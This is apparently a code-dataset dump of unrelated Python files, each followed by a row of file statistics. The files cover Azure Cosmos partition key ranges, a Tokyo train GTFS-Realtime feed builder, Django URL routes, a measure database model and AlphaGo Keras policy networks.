#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
"""Internal class for partition key range implementation in the Azure Cosmos database service.
"""
class PartitionKeyRange(object):
    """Partition Key Range Constants"""

    MinInclusive = 'minInclusive'
    MaxExclusive = 'maxExclusive'
    Id = 'id'
    Parents = 'parents'

class Range(object):
    """Represents a range of partition key values, with inclusive or exclusive bounds."""

    MinPath = 'min'
    MaxPath = 'max'
    IsMinInclusivePath = 'isMinInclusive'
    IsMaxInclusivePath = 'isMaxInclusive'

    def __init__(self, range_min, range_max, isMinInclusive, isMaxInclusive):
        if range_min is None:
            raise ValueError("min is missing")
        if range_max is None:
            raise ValueError("max is missing")

        self.min = range_min
        self.max = range_max
        self.isMinInclusive = isMinInclusive
        self.isMaxInclusive = isMaxInclusive
    def contains(self, value):
        minToValueRelation = Range._compare_helper(self.min, value)
        maxToValueRelation = Range._compare_helper(self.max, value)

        return ((self.isMinInclusive and minToValueRelation <= 0) or
                (not self.isMinInclusive and minToValueRelation < 0)) \
            and ((self.isMaxInclusive and maxToValueRelation >= 0) or
                 (not self.isMaxInclusive and maxToValueRelation > 0))
    @classmethod
    def PartitionKeyRangeToRange(cls, partition_key_range):
        self = cls(partition_key_range[PartitionKeyRange.MinInclusive],
                   partition_key_range[PartitionKeyRange.MaxExclusive],
                   True, False)
        return self

    @classmethod
    def ParseFromDict(cls, range_as_dict):
        self = cls(range_as_dict[Range.MinPath], range_as_dict[Range.MaxPath],
                   range_as_dict[Range.IsMinInclusivePath], range_as_dict[Range.IsMaxInclusivePath])
        return self
    def isSingleValue(self):
        return self.isMinInclusive and self.isMaxInclusive and self.min == self.max

    def isEmpty(self):
        return (not (self.isMinInclusive and self.isMaxInclusive)) and self.min == self.max

    def __hash__(self):
        return hash((self.min, self.max, self.isMinInclusive, self.isMaxInclusive))

    def __str__(self):
        return (('[' if self.isMinInclusive else '(') + str(self.min) + ',' +
                str(self.max) + (']' if self.isMaxInclusive else ')'))

    def __eq__(self, other):
        return (self.min == other.min) and (self.max == other.max) \
            and (self.isMinInclusive == other.isMinInclusive) \
            and (self.isMaxInclusive == other.isMaxInclusive)
    @staticmethod
    def _compare_helper(a, b):
        # python 3 compatible
        return (a > b) - (a < b)
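    # e.g. _compare_helper("A", "B") -> -1, mirroring Python 2's cmp()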
    @staticmethod
    def overlaps(range1, range2):
        if range1 is None or range2 is None:
            return False
        if range1.isEmpty() or range2.isEmpty():
            return False

        cmp1 = Range._compare_helper(range1.min, range2.max)
        cmp2 = Range._compare_helper(range2.min, range1.max)

        # the ranges overlap only if range1.min <= range2.max AND range2.min <= range1.max
        if (cmp1 <= 0 and cmp2 <= 0):
            if ((cmp1 == 0 and not(range1.isMinInclusive and range2.isMaxInclusive))
                    or (cmp2 == 0 and not(range2.isMinInclusive and range1.isMaxInclusive))):
                return False
            return True
        return False
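    # Example (hypothetical key values): overlaps(Range("A", "C", True, False),
    # Range("B", "D", True, False)) -> True, since "B" falls inside ["A", "C").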
| 40.111111 | 160 | 0.677978 | 518 | 4,332 | 5.584942 | 0.312741 | 0.030418 | 0.029381 | 0.022122 | 0.096094 | 0.040788 | 0.040788 | 0.040788 | 0.040788 | 0.040788 | 0 | 0.009976 | 0.23638 | 4,332 | 107 | 161 | 40.485981 | 0.864571 | 0.283934 | 0 | 0.131148 | 0 | 0 | 0.032595 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.180328 | false | 0 | 0 | 0.098361 | 0.540984 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa0688c2fdb5c7ce86d666b23ecb33de31238197 | 11,427 | py | Python | trains_realtime.py | chuwyton/TokyoGTFS | f4f7d2063858510bdf43f013049ffd27c4f4543c | [
"CC-BY-4.0"
] | null | null | null | trains_realtime.py | chuwyton/TokyoGTFS | f4f7d2063858510bdf43f013049ffd27c4f4543c | [
"CC-BY-4.0"
] | null | null | null | trains_realtime.py | chuwyton/TokyoGTFS | f4f7d2063858510bdf43f013049ffd27c4f4543c | [
"CC-BY-4.0"
] | null | null | null | from google.transit import gtfs_realtime_pb2 as gtfs_rt
from datetime import datetime, date, timedelta
import argparse
import requests
import zipfile
import iso8601
import ijson
import time
import pytz
import csv
import io
import os
__title__ = "TokyoGTFS: Trains-Realtime"
__author__ = "Mikołaj Kuranowski"
__email__ = "mikolaj@mkuran.pl"
__license__ = "CC BY 4.0"
EFFECTS = {
    "運転見合わせ": 1, "運転被約": 2, "遅延": 3, "運行情報あり": 6, "お知らせ": 6, "直通運転中止": 1
}

CAUSES = {
    "車両点検": 9, "車輪空転": 3, "大雨": 8, "大雪": 8, "地震": 6, "線路に支障物": 6, "シカと衝突": 6,
    "接続待合せ": 3, "異音の確認": 3, "架線点検": 3, "踏切に支障物": 6
}
class TrainRealtime:
    def __init__(self, apikey, gtfs_arch="tokyo_trains.zip"):
        self.apikey = apikey
        self.gtfs_arch = gtfs_arch
        self.timezone = pytz.timezone("Asia/Tokyo")
        self.active_routes = set()
        self.active_operators = set()

        # Get list of active routes
        with open("data/train_routes.csv", mode="r", encoding="utf8", newline="") as buff:
            for row in csv.DictReader(buff):
                self.active_routes.add(row["route_id"])
                self.active_operators.add(row["operator"])

        # Get map realtime_trip_id → trip_id
        self.trip_map_date = datetime.now(tz=self.timezone).strftime("%Y%m%d")
        self.trip_map = {}

        with zipfile.ZipFile(gtfs_arch, mode="r") as arch:
            # Get active calendars
            with arch.open("calendar_dates.txt") as buff:
                reader = csv.DictReader(io.TextIOWrapper(buff, encoding="utf8", newline=""))
                active_services = {i["service_id"] for i in reader if i["date"] == self.trip_map_date}

            # Map train_id → trip_id
            with arch.open("trips.txt") as buff:
                reader = csv.DictReader(io.TextIOWrapper(buff, encoding="utf8", newline=""))
                for row in reader:
                    if row["service_id"] in active_services and row["train_realtime_id"]:
                        if row["train_realtime_id"] not in self.trip_map:
                            self.trip_map[row["train_realtime_id"]] = []
                        self.trip_map[row["train_realtime_id"]].append(row["trip_id"])
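        # One realtime train id can map to several GTFS trips (e.g. a through-running
        # train that appears as a separate trip on each railway), hence the list values.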
    def delays(self, container):
        now = datetime.now(tz=self.timezone)
        if self.trip_map_date != now.strftime("%Y%m%d"):
            # the service date changed: reload the trip map
            self.__init__(self.apikey, self.gtfs_arch)

        trains_req = requests.get("https://api-tokyochallenge.odpt.org/api/v4/odpt:Train", params={"acl:consumerKey": self.apikey}, timeout=60, stream=True)
        trains_req.raise_for_status()

        #trains = ijson.items(trains_req.raw, "item")
        trains = trains_req.json()

        for train in trains:
            train_id = train["owl:sameAs"].split(":")[1]
            trips = self.trip_map.get(train_id, [])

            # Assume the train maps to some trip
            if not trips:
                continue

            # Load some info about train
            delay = train.get("odpt:delay")
            current_stop = train.get("odpt:fromStation")
            next_stop = train.get("odpt:toStation")
            route = train["odpt:railway"].split(":")[1]
            update_timestamp = round(iso8601.parse_date(train["dc:date"]).timestamp())

            # Be sure data is not too old
            if "dct:valid" in train:
                if now > iso8601.parse_date(train["dct:valid"]):
                    continue

            # Make sure we have info about delay/current stop
            if delay is None or current_stop is None:
                continue

            for trip_id in trips:
                trip_belongs_to_current_route = trip_id.split(".")[1] == route.split(".")[1]

                entity = container.entity.add()
                entity.id = train["@id"] + "/" + trip_id

                if delay is not None:
                    trip_update = entity.trip_update
                    trip_update.trip.trip_id = trip_id
                    trip_update.delay = delay
                    trip_update.timestamp = update_timestamp

                if next_stop and trip_belongs_to_current_route:
                    vehicle = entity.vehicle
                    vehicle.trip.trip_id = trip_id
                    vehicle.stop_id = next_stop.split(":")[1]
                    vehicle.current_status = 2
                    vehicle.timestamp = update_timestamp

                elif current_stop and trip_belongs_to_current_route:
                    vehicle = entity.vehicle
                    vehicle.trip.trip_id = trip_id
                    vehicle.stop_id = current_stop.split(":")[1]
                    vehicle.current_status = 1
                    vehicle.timestamp = update_timestamp

        return container
    def alerts(self, container):
        alerts_req = requests.get("https://api-tokyochallenge.odpt.org/api/v4/odpt:TrainInformation", params={"acl:consumerKey": self.apikey}, timeout=60, stream=True)
        alerts_req.raise_for_status()

        #alerts = ijson.items(alerts_req.raw, "item")
        alerts = alerts_req.json()

        for alert in alerts:
            # Load basic info about the alert
            operator = alert["odpt:operator"].split(":")[1]
            route = alert["odpt:railway"].split(":")[1] if "odpt:railway" in alert else ""

            # Load info about validity time
            start_time = round(iso8601.parse_date(alert["odpt:timeOfOrigin"]).timestamp()) if "odpt:timeOfOrigin" in alert else None
            end_time = round(iso8601.parse_date(alert["dct:valid"]).timestamp()) if "dct:valid" in alert else None
            recovery_time = iso8601.parse_date(alert["odpt:resumeEstimate"]).strftime("%Y-%m-%d %H:%M") if "odpt:resumeEstimate" in alert else None

            # Ignore alerts that denote normal service status
            if alert.get("odpt:trainInformationStatus") is None or \
                    alert.get("odpt:trainInformationStatus", {}).get("ja", "平常") == "平常":
                continue

            # Ignore alerts for inactive operators and inactive routes
            if operator not in self.active_operators or (route and route not in self.active_routes):
                continue

            # Data
            cause = alert.get("odpt:trainInformationCauseTitle", {}) or alert.get("odpt:trainInformationCause", {})
            direction = alert.get("odpt:trainInformationLineTitle", {}) or alert.get("odpt:trainInformationLine", {})
            area = alert.get("odpt:trainInformationAreaTitle", {}) or alert.get("odpt:trainInformationArea", {})

            # Create GTFS-RT entity
            entity = container.entity.add()
            entity.id = alert["@id"]

            # Add info about alerted routes
            informed = entity.alert.informed_entity.add()
            if not route:
                informed.agency_id = operator
            else:
                informed.route_id = route

            # Load info about validity time
            if start_time or end_time:
                period = entity.alert.active_period.add()
            if start_time:
                period.start = start_time
            if end_time:
                period.end = end_time

            # Try to guess the cause and effect, defaulting to UNKNOWN_CAUSE and UNKNOWN_EFFECT
            entity.alert.cause = CAUSES.get(cause.get("ja", ""), 1)
            entity.alert.effect = EFFECTS.get(alert.get("odpt:trainInformationStatus", {}).get("ja", ""), 8)

            # Get alert header
            header_ja = alert["odpt:trainInformationStatus"]["ja"]
            translation = entity.alert.header_text.translation.add()
            translation.language, translation.text = "ja", header_ja

            if "en" in alert["odpt:trainInformationStatus"]:
                translation = entity.alert.header_text.translation.add()
                translation.language, translation.text = "en", alert["odpt:trainInformationStatus"]["en"]

            # Construct alert body
            # Append main info
            ja_body, en_body = alert["odpt:trainInformationText"]["ja"], alert["odpt:trainInformationText"].get("en", "")
            ja_body += "\n\n"
            if en_body:
                en_body += "\n\n"

            # Add cause, if it's defined
            if "ja" in cause:
                ja_body += "発生理由:" + cause["ja"] + "\n"
            if "en" in cause:
                en_body += "Cause: " + cause["en"] + "\n"

            # Add direction, if it's defined
            if "ja" in direction:
                ja_body += "列車の運転方向:" + direction["ja"] + "\n"
            if "en" in direction:
                en_body += "Direction: " + direction["en"] + "\n"

            # Add affected area, if it's defined
            if "ja" in area:
                ja_body += "発生エリア:" + area["ja"] + "\n"
            if "en" in area:
                en_body += "Affected area: " + area["en"] + "\n"

            # Add recovery time, if it's defined
            if recovery_time:
                ja_body += "復旧見込み時刻:" + recovery_time + "\n"
                en_body += "Estimated Recovery Time: " + recovery_time + "\n"

            # Add body to alert
            translation = entity.alert.description_text.translation.add()
            translation.language, translation.text = "ja", ja_body.strip()

            if en_body:
                translation = entity.alert.description_text.translation.add()
                translation.language, translation.text = "en", en_body.strip()

        return container
    def parse(self, human_readable=False):
        container = gtfs_rt.FeedMessage()
        header = container.header
        header.gtfs_realtime_version = "2.0"
        header.incrementality = 0
        header.timestamp = round(datetime.today().timestamp())

        container = self.delays(container)
        container = self.alerts(container)

        mode = "w" if human_readable else "wb"
        with open("tokyo_trains_rt.pb", mode=mode) as f:
            if human_readable:
                f.write(str(container))
            else:
                f.write(container.SerializeToString())
if __name__ == "__main__":
args_parser = argparse.ArgumentParser()
args_parser.add_argument("-a", "--apikey", metavar="YOUR-APIKEY", help="apikey from developer-tokyochallenge.odpt.org")
args_parser.add_argument("-g", "--gtfs", metavar="PATH-TO-TRAINS-GTFS.zip", default="tokyo_trains.zip", help="path to GTFS created by trains_gtfs.py")
args_parser.add_argument("-hr", "--human-readable", action="store_true", help="output gtfs-realtime file as human-readable instead of binary")
args = args_parser.parse_args()
if args.apikey:
apikey = args.apikey
elif os.path.exists("apikey.txt"):
with open("apikey.txt", mode="r", encoding="utf8") as f:
apikey = f.read().strip()
else:
raise RuntimeError("No apikey!\n Provide it inside command line argument '--apikey',\n Or put it inside a file named 'apikey.txt'.")
start_time = time.time()
print("""
| _____ _ ____ _____ _____ ____ |
| |_ _|__ | | ___ _ ___ / ___|_ _| ___/ ___| |
| | |/ _ \| |/ / | | |/ _ \| | _ | | | |_ \___ \ |
| | | (_) | <| |_| | (_) | |_| | | | | _| ___) | |
| |_|\___/|_|\_\\\\__, |\___/ \____| |_| |_| |____/ |
| |___/ |
""")
print("=== Trains GTFS-RT: Starting! ===")
parser = TrainRealtime(apikey=apikey, gtfs_arch=args.gtfs)
parser.parse(human_readable=args.human_readable)
total_time = time.time() - start_time
print("=== TokyoGTFS: Finished in {} s ===".format(round(total_time, 2)))
| 44.290698 | 167 | 0.581868 | 1,330 | 11,427 | 4.784211 | 0.222556 | 0.012258 | 0.016973 | 0.011315 | 0.231337 | 0.19802 | 0.161559 | 0.13327 | 0.132013 | 0.116612 | 0 | 0.008605 | 0.28809 | 11,427 | 257 | 168 | 44.463035 | 0.773325 | 0.075873 | 0 | 0.116022 | 0 | 0.027624 | 0.205374 | 0.043297 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022099 | false | 0 | 0.066298 | 0 | 0.104972 | 0.016575 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa06ed62e14d3d18ab004066054a101e574b0878 | 396 | py | Python | browser/urls.py | ziotom78/litebird_imo | 94cc93543afc2d6e22395ebd7382c4139fa14927 | [
"Unlicense"
] | null | null | null | browser/urls.py | ziotom78/litebird_imo | 94cc93543afc2d6e22395ebd7382c4139fa14927 | [
"Unlicense"
] | null | null | null | browser/urls.py | ziotom78/litebird_imo | 94cc93543afc2d6e22395ebd7382c4139fa14927 | [
"Unlicense"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
    path("", views.EntityTypeListView.as_view(), name="index"),
    path("entity_types/<int:pk>/", views.EntityTypeView.as_view(), name="entity_type_detail"),
    path("entity/<str:pk>/", views.EntityView.as_view(), name="entity_detail"),
    path("data_file/<str:pk>/", views.DataFileView.as_view(), name="data_file_detail"),
]
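# <int:pk> and <str:pk> are Django path converters: they match the URL segment
# and pass it to the view as the primary-key keyword argument `pk`.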
| 36 | 94 | 0.70202 | 53 | 396 | 5.037736 | 0.45283 | 0.089888 | 0.149813 | 0.11985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106061 | 396 | 10 | 95 | 39.6 | 0.754237 | 0 | 0 | 0 | 0 | 0 | 0.275253 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa07962a2a6a8d368d731f3161674d8005dd3f38 | 873 | py | Python | src/models/measure.py | ja573/metrics-api | cd1bf46dd5d015f562ce2020519484c19db10e3e | [
"MIT"
] | 1 | 2019-08-20T10:25:28.000Z | 2019-08-20T10:25:28.000Z | src/models/measure.py | ja573/metrics-api | cd1bf46dd5d015f562ce2020519484c19db10e3e | [
"MIT"
] | 6 | 2019-05-21T17:07:03.000Z | 2020-12-10T13:01:07.000Z | src/models/measure.py | ja573/metrics-api | cd1bf46dd5d015f562ce2020519484c19db10e3e | [
"MIT"
] | 1 | 2019-08-08T14:28:45.000Z | 2019-08-08T14:28:45.000Z | from api import db
from .queries import do_query, dbcheck
class Measure():
    def __init__(self, measure_uri, namespace, source, mtype, version):
        self.measure_uri = measure_uri
        self.namespace = namespace
        self.source = source
        self.type = mtype
        self.version = version

    def load_description(self):
        description = self.get_description()
        self.description = description.list() if description else []
    def get_description(self):
        options = dict(uri=self.measure_uri)
        q = '''SELECT locale_code, locale_name, description
               FROM measure_description INNER JOIN locale USING(locale_code)
               WHERE measure_uri = $uri
               ORDER BY locale_code;'''
        return do_query(q, options)
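    # `$uri` is a named placeholder that do_query is expected to bind from the
    # `options` dict (web.py-style parameter substitution), so the URI is never
    # interpolated into the SQL string directly.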
    @staticmethod
    @dbcheck
    def get_all():
        return db.select('measure')
| 30.103448 | 76 | 0.642612 | 101 | 873 | 5.356436 | 0.405941 | 0.092421 | 0.077634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274914 | 873 | 28 | 77 | 31.178571 | 0.85466 | 0 | 0 | 0 | 0 | 0 | 0.234822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.086957 | 0.043478 | 0.391304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa086ab24f02d8df0570374d9cec85eb1ae2e56f | 13,493 | py | Python | AlphaGo/models/policy.py | vftens/RocAlphaGo-aug25-keras2-py35 | 67ad5242ea7a8cdda60b9e10590f7bc9e91447c6 | [
"MIT"
] | null | null | null | AlphaGo/models/policy.py | vftens/RocAlphaGo-aug25-keras2-py35 | 67ad5242ea7a8cdda60b9e10590f7bc9e91447c6 | [
"MIT"
] | null | null | null | AlphaGo/models/policy.py | vftens/RocAlphaGo-aug25-keras2-py35 | 67ad5242ea7a8cdda60b9e10590f7bc9e91447c6 | [
"MIT"
] | null | null | null | from keras.models import Sequential, Model
from keras.layers import Input, BatchNormalization, Conv2D
from keras.layers.merge import add
from keras.layers.core import Activation, Flatten
from AlphaGo.util import flatten_idx
from AlphaGo.models.nn_util import Bias, NeuralNetBase, neuralnet
import numpy as np
@neuralnet
class CNNPolicy(NeuralNetBase):
    """uses a convolutional neural network to evaluate the state of the game
    and compute a probability distribution over the next action
    """

    def _select_moves_and_normalize(self, nn_output, moves, size):
        """helper function to normalize a distribution over the given list of moves
        and return a list of (move, prob) tuples
        """
        if len(moves) == 0:
            return []
        move_indices = [flatten_idx(m, size) for m in moves]
        # get network activations at legal move locations
        distribution = nn_output[move_indices]
        distribution = distribution / distribution.sum()
        return list(zip(moves, distribution))
    def batch_eval_state(self, states, moves_lists=None):
        """Given a list of states, evaluates them all at once to make best use of GPU
        batching capabilities.

        Analogous to [eval_state(s) for s in states]

        Returns: a parallel list of move distributions as in eval_state
        """
        n_states = len(states)
        if n_states == 0:
            return []
        state_size = states[0].get_size()
        if not all([st.get_size() == state_size for st in states]):
            raise ValueError("all states must have the same size")
        # concatenate together all one-hot encoded states along the 'batch' dimension
        nn_input = np.concatenate([self.preprocessor.state_to_tensor(s) for s in states], axis=0)
        # pass all input through the network at once (backend makes use of
        # batches if len(states) is large)
        network_output = self.forward(nn_input)
        # default move lists to all legal moves
        moves_lists = moves_lists or [st.get_legal_moves() for st in states]
        results = [None] * n_states
        for i in range(n_states):
            results[i] = self._select_moves_and_normalize(network_output[i], moves_lists[i],
                                                          state_size)
        return results
    def eval_state(self, state, moves=None):
        """Given a GameState object, returns a list of (action, probability) pairs
        according to the network outputs

        If a list of moves is specified, only those moves are kept in the distribution
        """
        tensor = self.preprocessor.state_to_tensor(state)
        # run the tensor through the network
        network_output = self.forward(tensor)
        moves = moves or state.get_legal_moves()
        return self._select_moves_and_normalize(network_output[0], moves, state.get_size())
    @staticmethod
    def create_network(**kwargs):
        """construct a convolutional neural network.

        Keyword Arguments:
        - input_dim:            depth of features to be processed by first layer (no default)
        - board:                width of the go board to be processed (default 19)
        - filters_per_layer:    number of filters used on every layer (default 128)
        - filters_per_layer_K:  (where K is between 1 and <layers>) number of filters
                                used on layer K (default #filters_per_layer)
        - layers:               number of convolutional steps (default 12)
        - filter_width_K:       (where K is between 1 and <layers>) width of filter on
                                layer K (default 3 except 1st layer which defaults to 5).
                                Must be odd.
        """
        defaults = {
            "board": 19,
            "filters_per_layer": 128,
            "layers": 12,
            "filter_width_1": 5
        }
        # copy defaults, but override with anything in kwargs
        params = defaults
        params.update(kwargs)

        # create the network:
        # a series of zero-paddings followed by convolutions
        # such that the output dimensions are also board x board
        network = Sequential()

        # create first layer
        network.add(Conv2D(
            input_shape=(params["input_dim"], params["board"], params["board"]),
            filters=params.get("filters_per_layer_1", params["filters_per_layer"]),
            kernel_size=(params["filter_width_1"], params["filter_width_1"]),
            kernel_initializer='uniform',
            activation='relu',
            padding='same',
            kernel_constraint=None,
            activity_regularizer=None,
            trainable=True,
            strides=[1, 1],
            use_bias=True,
            bias_regularizer=None,
            bias_constraint=None,
            data_format="channels_first",
            kernel_regularizer=None))

        # create all other layers
        for i in range(2, params["layers"] + 1):
            # use filter_width_K if it is there, otherwise use 3
            filter_key = "filter_width_%d" % i
            filter_width = params.get(filter_key, 3)

            # use filters_per_layer_K if it is there, otherwise use default value
            filter_count_key = "filters_per_layer_%d" % i
            filter_nb = params.get(filter_count_key, params["filters_per_layer"])

            network.add(Conv2D(
                filters=filter_nb,
                kernel_size=(filter_width, filter_width),
                kernel_initializer='uniform',
                activation='relu',
                padding='same',
                kernel_constraint=None,
                activity_regularizer=None,
                trainable=True,
                strides=[1, 1],
                use_bias=True,
                bias_regularizer=None,
                bias_constraint=None,
                data_format="channels_first",
                kernel_regularizer=None))

        # the last layer maps each <filters_per_layer> feature to a number
        network.add(Conv2D(
            filters=1,
            kernel_size=(1, 1),
            kernel_initializer='uniform',
            padding='same',
            kernel_constraint=None,
            activity_regularizer=None,
            trainable=True,
            strides=[1, 1],
            use_bias=True,
            bias_regularizer=None,
            bias_constraint=None,
            data_format="channels_first",
            kernel_regularizer=None))
        # reshape output to be board x board
        network.add(Flatten())
        # add a bias to each board location
        network.add(Bias())
        # softmax makes it into a probability distribution
        network.add(Activation('softmax'))

        return network
@neuralnet
class ResnetPolicy(CNNPolicy):
    """Residual network architecture as per He et al. 2015
    """

    @staticmethod
    def create_network(**kwargs):
        """construct a convolutional neural network with Resnet-style skip connections.
        Arguments are the same as with the default CNNPolicy network, except the default
        number of layers is 20 plus a new n_skip parameter

        Keyword Arguments:
        - input_dim:            depth of features to be processed by first layer (no default)
        - board:                width of the go board to be processed (default 19)
        - filters_per_layer:    number of filters used on every layer (default 128)
        - layers:               number of convolutional steps (default 20)
        - filter_width_K:       (where K is between 1 and <layers>) width of filter on
                                layer K (default 3 except 1st layer which defaults to 5).
                                Must be odd.
        - n_skip_K:             (where K is as in filter_width_K) number of convolutional
                                layers to skip with the linear path starting at K. Only valid
                                at K >= 1. (Each layer defaults to 1)

        Note that n_skip_1=s means that the next valid value of n_skip_* is 3

        A diagram may help explain (numbers indicate layer):

               1    2    3    4    5    6
        I--C--B--R--C--B--R--C--M--B--R--C--B--R--C--B--R--C--M ... M--R--F--O
              \__________________/ \___________________________/ \ ... /
                 [n_skip_1 = 2]          [n_skip_3 = 3]

        I - input
        B - BatchNormalization
        R - ReLU
        C - Conv2D
        F - Flatten
        O - output
        M - merge

        The input is always passed through a Conv2D layer, the output of which
        layer is counted as '1'. Each subsequent [R -- C] block is counted as
        one 'layer'. The 'merge' layer isn't counted; hence if n_skip_1 is 2,
        the next valid skip parameter is n_skip_3, which will start at the
        output of the merge
        """
        defaults = {
            "board": 19,
            "filters_per_layer": 128,
            "layers": 20,
            "filter_width_1": 5
        }
        # copy defaults, but override with anything in kwargs
        params = defaults
        params.update(kwargs)

        # create the network using Keras' functional API,
        # since this isn't 'Sequential'
        model_input = Input(shape=(params["input_dim"], params["board"], params["board"]))
        # create first layer
        convolution_path = Conv2D(
            input_shape=(),
            filters=params["filters_per_layer"],
            kernel_size=(params["filter_width_1"], params["filter_width_1"]),
            kernel_initializer='uniform',
            activation='linear',  # relu activations done inside resnet modules
            padding='same',
            kernel_constraint=None,
            activity_regularizer=None,
            trainable=True,
            strides=[1, 1],
            use_bias=True,
            bias_regularizer=None,
            bias_constraint=None,
            data_format="channels_first",
            kernel_regularizer=None)(model_input)
        def add_resnet_unit(path, K, **params):
            """Add a resnet unit to path starting at layer 'K',
            adding as many (ReLU + Conv2D) modules as specified by n_skip_K

            Returns new path and next layer index, i.e. K + n_skip_K, in a tuple
            """
            # loosely based on https://github.com/keunwoochoi/residual_block_keras
            # see also keras docs here:
            # http://keras.io/getting-started/functional-api-guide/#all-models-are-callable-just-like-layers

            block_input = path
            # use n_skip_K if it is there, default to 1
            skip_key = "n_skip_%d" % K
            n_skip = params.get(skip_key, 1)
            for i in range(n_skip):
                layer = K + i
                # add BatchNorm
                path = BatchNormalization()(path)
                # add ReLU
                path = Activation('relu')(path)
                # use filter_width_K if it is there, otherwise use 3
                filter_key = "filter_width_%d" % layer
                filter_width = params.get(filter_key, 3)
                # add Conv2D
                path = Conv2D(
                    filters=params["filters_per_layer"],
                    kernel_size=(filter_width, filter_width),
                    kernel_initializer='uniform',
                    activation='linear',
                    padding='same',
                    kernel_constraint=None,
                    activity_regularizer=None,
                    trainable=True,
                    strides=[1, 1],
                    use_bias=True,
                    bias_regularizer=None,
                    bias_constraint=None,
                    data_format="channels_first",
                    kernel_regularizer=None)(path)
            # Merge 'input layer' with the path
            path = add([block_input, path])
            return path, K + n_skip
        # create all other layers
        layer = 1
        while layer < params['layers']:
            convolution_path, layer = add_resnet_unit(convolution_path, layer, **params)
        if layer > params['layers']:
            print(("Due to skipping, ended with {} layers instead of {}"
                   .format(layer, params['layers'])))

        # since each layer's activation was linear, need one more ReLU
        convolution_path = Activation('relu')(convolution_path)

        # the last layer maps each <filters_per_layer> feature to a number
        convolution_path = Conv2D(
            filters=1,
            kernel_size=(1, 1),
            kernel_initializer='uniform',
            name="policy_conv_last",
            padding='same',
            activation="linear",
            kernel_constraint=None,
            activity_regularizer=None,
            trainable=True,
            strides=[1, 1],
            use_bias=True,
            bias_regularizer=None,
            bias_constraint=None,
            data_format="channels_first",
            kernel_regularizer=None)(convolution_path)
        # flatten output
        network_output = Flatten()(convolution_path)
        # add a bias to each board location
        network_output = Bias()(network_output)
        # softmax makes it into a probability distribution
        network_output = Activation('softmax')(network_output)

        return Model(inputs=[model_input], outputs=[network_output])
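# A minimal usage sketch (input_dim is whatever feature depth the preprocessor
# produces; 48 here is only an illustrative value):
#   policy_net = CNNPolicy.create_network(input_dim=48)
#   policy_net.summary()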
| 41.389571 | 108 | 0.580523 | 1,592 | 13,493 | 4.734296 | 0.198492 | 0.02773 | 0.029853 | 0.02229 | 0.44328 | 0.42298 | 0.412366 | 0.385963 | 0.338729 | 0.326522 | 0 | 0.012681 | 0.339583 | 13,493 | 325 | 109 | 41.516923 | 0.833128 | 0.364782 | 0 | 0.565217 | 0 | 0 | 0.080643 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032609 | false | 0 | 0.038043 | 0 | 0.125 | 0.005435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa09481c8f443c2c7a46f58d6ac6aedc63e011ea | 4,952 | py | Python | src/compas_vol/primitives/platonic.py | dbt-ethz/compas_vol | d8faa22b4b782896837eac0fa10eefb9b2d7f928 | [
"MIT"
] | 8 | 2020-02-13T11:51:03.000Z | 2022-01-13T10:27:47.000Z | src/compas_vol/primitives/platonic.py | dbt-ethz/compas_vol | d8faa22b4b782896837eac0fa10eefb9b2d7f928 | [
"MIT"
] | 5 | 2019-12-04T19:48:40.000Z | 2021-08-23T09:48:48.000Z | src/compas_vol/primitives/platonic.py | dbt-ethz/compas_vol | d8faa22b4b782896837eac0fa10eefb9b2d7f928 | [
"MIT"
